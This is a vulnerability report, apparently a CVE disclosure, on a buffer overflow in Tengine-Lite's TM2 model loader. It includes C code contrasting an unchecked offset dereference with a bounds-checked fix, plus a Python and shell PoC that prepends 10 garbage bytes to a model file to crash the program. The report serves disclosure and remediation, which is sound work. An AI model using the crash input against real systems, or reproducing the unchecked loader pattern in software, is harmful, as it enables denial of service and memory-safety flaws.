Description
Vulnerability analysis
We found a buffer overflow in the serializer module, in the loader for TM2 model files.
Link: https://github.com/OAID/Tengine/blob/tengine-lite/src/serializer/tm/tm2_serializer.c
The problem is in the load_model function starting at line 798, which calls the get_tm_file_model function at line 840.
The first parameter of get_tm_file_model, mem_base, points to the memory where the model file has been loaded, and the second parameter is derived from data read through mem_base. In this project the model file is user-supplied input, so both parameters of get_tm_file_model are attacker-controlled: a crafted or corrupted header steers where the loader reads relative to mem_base.
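The pattern described above, as an added illustration (this is not Tengine's code and the header layout, the TOY_MAGIC value and the function names are hypothetical, not the TM2 format): a loader that dereferences mem_base plus an offset read out of the same user-controlled file, beside a hardened loader that validates every offset against the mapped size before touching it. The constructed sample inputs mirror the PoC below (a well-formed file, the same file with 10 garbage bytes prepended, and a file whose magic is intact but whose root offset points far outside the mapping).

```c
/* Added illustration of a loader that trusts an offset read from the model
 * file, versus one that bounds-checks it against the mapped size.
 * Layout, magic and names are hypothetical, not Tengine's TM2 format. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define TOY_MAGIC 0x544d4f59u  /* made up for this example */
#define TOY_NODE_SIZE 8u       /* size of one node record, made up */

typedef struct {
    uint32_t magic;
    uint32_t root_offset;   /* where the root table lives, taken from the file */
} toy_header_t;

typedef struct {
    uint32_t node_count;
    uint32_t nodes_offset;  /* where node_count node records start */
} toy_root_t;

/* Vulnerable shape: mem_base points at the mapped file, root_offset comes out
 * of that same memory, and the sum is dereferenced with no size check. A
 * corrupted header sends the read anywhere up to 4 GiB past mem_base. */
const toy_root_t *get_root_unchecked(const uint8_t *mem_base)
{
    const toy_header_t *h = (const toy_header_t *)mem_base;
    return (const toy_root_t *)(mem_base + h->root_offset);
}

/* 1 if [off, off+len) lies inside a buffer of mem_size bytes.
 * Written with subtraction so off + len can never wrap around. */
static int range_ok(size_t mem_size, uint64_t off, uint64_t len)
{
    return off <= mem_size && len <= mem_size - off;
}

/* Hardened shape: every offset is validated against mem_size before use, and
 * structures are memcpy'd out so an unaligned offset is harmless as well.
 * Returns 0 on success, -1 on any malformed input. */
int load_root_checked(const uint8_t *mem_base, size_t mem_size, toy_root_t *out)
{
    toy_header_t h;
    if (mem_base == NULL || out == NULL) return -1;
    if (!range_ok(mem_size, 0, sizeof h)) return -1;
    memcpy(&h, mem_base, sizeof h);
    if (h.magic != TOY_MAGIC) return -1;
    if (!range_ok(mem_size, h.root_offset, sizeof *out)) return -1;
    memcpy(out, mem_base + h.root_offset, sizeof *out);
    /* node_count * TOY_NODE_SIZE is computed in 64 bits: no 32-bit wrap */
    if (!range_ok(mem_size, out->nodes_offset,
                  (uint64_t)out->node_count * TOY_NODE_SIZE)) return -1;
    return 0;
}

/* Constructed sample input: a well-formed toy file with 3 zeroed nodes.
 * Returns its length, or 0 if cap is too small. */
size_t make_valid_file(uint8_t *buf, size_t cap)
{
    toy_header_t h = { TOY_MAGIC, sizeof(toy_header_t) };
    toy_root_t r = { 3, sizeof(toy_header_t) + sizeof(toy_root_t) };
    size_t len = sizeof h + sizeof r + r.node_count * TOY_NODE_SIZE;
    if (cap < len) return 0;
    memcpy(buf, &h, sizeof h);
    memcpy(buf + sizeof h, &r, sizeof r);
    memset(buf + sizeof h + sizeof r, 0, len - sizeof h - sizeof r);
    return len;
}

/* Mirrors the PoC: shifts the whole file right by n bytes of 'A'. */
size_t prepend_garbage(uint8_t *buf, size_t len, size_t cap, size_t n)
{
    if (len + n > cap) return 0;
    memmove(buf + n, buf, len);
    memset(buf, 'A', n);
    return len + n;
}

/* Keeps the magic intact but points root_offset far outside the file. */
size_t make_bad_offset_file(uint8_t *buf, size_t cap)
{
    size_t len = make_valid_file(buf, cap);
    uint32_t off = 0x7fffffffu;
    if (len) memcpy(buf + offsetof(toy_header_t, root_offset), &off, sizeof off);
    return len;
}

int main(void)
{
    uint8_t buf[128];
    toy_root_t r;
    size_t len = make_valid_file(buf, sizeof buf);
    printf("valid:      %s\n", load_root_checked(buf, len, &r) == 0 ? "ok" : "rejected");
    len = make_bad_offset_file(buf, sizeof buf);
    printf("bad offset: %s\n", load_root_checked(buf, len, &r) == 0 ? "ok" : "rejected");
    len = make_valid_file(buf, sizeof buf);
    len = prepend_garbage(buf, len, sizeof buf, 10);
    printf("10 x 'A':   %s\n", load_root_checked(buf, len, &r) == 0 ? "ok" : "rejected");
    return 0;
}
```

The point of the checked variant is that mem_size (the real length of the mapped file) is threaded through every dereference; get_root_unchecked has no way to know where the mapping ends, so any offset the file supplies is accepted. The prepended-garbage case is rejected at the magic check; the bad-offset case shows why a magic check alone is not enough.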
PoC
Download the official example models; the landmark model is used for the demonstration here.
Following the official usage example, the unmodified landmark model runs normally.
Prepend 9 bytes of garbage to the header of landmark.tmfile and run the landmark model: the program exits with an ordinary error.
Prepend 10 bytes of garbage to the header of landmark.tmfile and run the landmark model: the program crashes.
EXP:
import os

# work on a copy so the original model stays intact
os.system('cp landmark.tmfile test.tmfile')
with open("./test.tmfile", "rb+") as f:
    old = f.read()
    n = 0xA  # number of garbage bytes; 9 gives a clean error, 10 crashes
    print('Writes %d bytes of data to the file header' % n)
    text = b'A' * n
    f.seek(0)
    f.write(text)  # garbage first ...
    f.write(old)   # ... then the original contents, shifted right by n bytes
os.system('./attack.sh')

attack.sh:
#!/bin/sh
dir='/mnt/hgfs/starcross/CVE/Tengine-Lite'
export LD_LIBRARY_PATH="$dir/build/install/lib"
"$dir/build/install/bin/tm_landmark" -m "$dir/model/landmark/test.tmfile" -i "$dir/model/landmark/photo.jpg" -r 1 -t 1